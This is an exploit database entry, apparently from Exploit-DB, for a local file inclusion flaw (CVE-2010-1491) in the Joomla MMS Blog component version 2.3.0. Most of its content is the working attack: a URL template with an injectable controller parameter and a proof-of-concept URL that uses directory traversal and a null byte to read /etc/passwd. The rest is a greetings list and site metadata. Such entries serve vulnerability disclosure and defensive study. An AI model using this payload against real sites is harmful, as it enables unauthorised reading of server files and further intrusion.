| EDB-ID: 12318 | Author: AntiSecurity | Published: 2010-04-21 | |
| CVE: CVE-2010-1491 | Type: Webapps | Platform: PHP | |
| Aliases: N/A | Advisory/Source: N/A | Tags: Vulnerability | |
E-DB Verified:
 |
Exploit:
 Download
/
View Raw
|
Vulnerable App:
|
|
=============================================================================================================
[o] Joomla Component MMS Blog Local File Inclusion Vulnerability
Software : com_mmsblog version 2.3.0
Vendor : http://mms.pipp.no/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
=============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_mmsblog&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
=============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
=============================================================================================================
[o] April 21 2010 - GMT +07:00 Jakarta, Indonesia
Related Exploits
Trying to match CVEs (1): CVE-2010-1491Trying to match OSVDBs (1): 63989
Trying to match setup file: 337aa4671e8695d51099b8e97c4a267a
Other Possible E-DB Search Terms: Joomla! Component MMS Blog 2.3.0, Joomla! Component MMS Blog
| Date | D | V | Title | Author | No matches |
|---|